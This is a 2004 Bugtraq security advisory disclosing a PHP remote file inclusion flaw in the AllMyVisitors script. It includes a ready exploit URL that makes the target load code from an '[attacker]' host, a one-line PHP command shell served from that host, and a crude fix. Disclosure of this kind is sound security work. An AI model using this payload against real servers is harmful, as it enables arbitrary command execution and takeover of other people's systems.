[33760] in bugtraq

home help back first fref pref prev next nref lref last post

AllMyVisitors PHP Code Injection vulnerability

daemon@ATHENA.MIT.EDU (Pablo Santana)
Mon Feb 16 23:17:43 2004

Date: 14 Feb 2004 22:18:04 -0000
Message-ID: <20040214221804.32312.qmail@www.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: Pablo Santana <m4dsk4t3r@hotmail.com>
To: bugtraq@securityfocus.com



******** AllMyVisitors PHP Code Injection vulnerability ********

Product : AllMyVisitors
Vendor : www.php-resource.net
Date : February 14, 2004
Problem : PHP Code Injection
Vendor Contacted ? : No

************************** Source ****************************

in /include/info.inc.php

--------------------------------------------------------------

$AMV_info_get = require_once("$_AMVconfig[cfg_serverpath]"."/include/template.inc.php");

--------------------------------------------------------------

************************** Exploit ***************************

http://[target]/allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=http://[attacker]/&cmd=uname%20-a

in http://[attacker]/include/template.inc.php have :

------------------------

<?
system($cmd);
?>

------------------------

************************** Impact ****************************

Malicious user execute arbitrary commands on the server .

************************* Solution ***************************

in /include/info.inc.php replace 

$AMV_info_get = require_once("$_AMVconfig[cfg_serverpath]"."/include/template.inc.php");


for


if (isset($_AMVconfig[cfg_serverpath])){
  die("Don\'t Hack it :)");
}

$AMV_info_get = require_once("$_AMVconfig[cfg_serverpath]"."/include/template.inc.php"); 

************************** Credits ****************************

bnfx : bnfx@antisocial.com

Mad_Skater : m4dsk4t3r@hotmail.com

TechTeam Brazilian Crew .


home help back first fref pref prev next nref lref last post